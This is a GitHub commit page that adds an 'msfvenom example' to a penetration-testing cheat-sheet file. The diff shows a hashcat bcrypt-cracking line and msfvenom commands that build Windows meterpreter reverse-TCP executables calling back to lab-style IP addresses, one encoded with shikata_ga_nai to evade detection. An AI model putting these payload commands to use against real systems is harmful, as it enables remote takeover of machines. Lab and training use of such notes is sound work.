Skip to content

Commit

Permalink
msfvenom example
Browse files Browse the repository at this point in the history
  • Loading branch information
Leetcore authored Jun 12, 2022
1 parent f6227ba commit 5abd44a
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions 1337_file.txt
Original file line number Diff line number Diff line change
Expand Up @@ -40,6 +40,8 @@ hashcat -m 3200 bcrypt.hash /usr/share/wordlists/rockyou.txt
# MSFVENOM (msfvenom, msf, metasploit)
Generate reverse shell exe (bash):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1338 -f exe -o /home/kali/rev.exe
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./Lala.exe


# Python webserver
Host files (bash):
Expand Down

0 comments on commit 5abd44a

Please sign in to comment.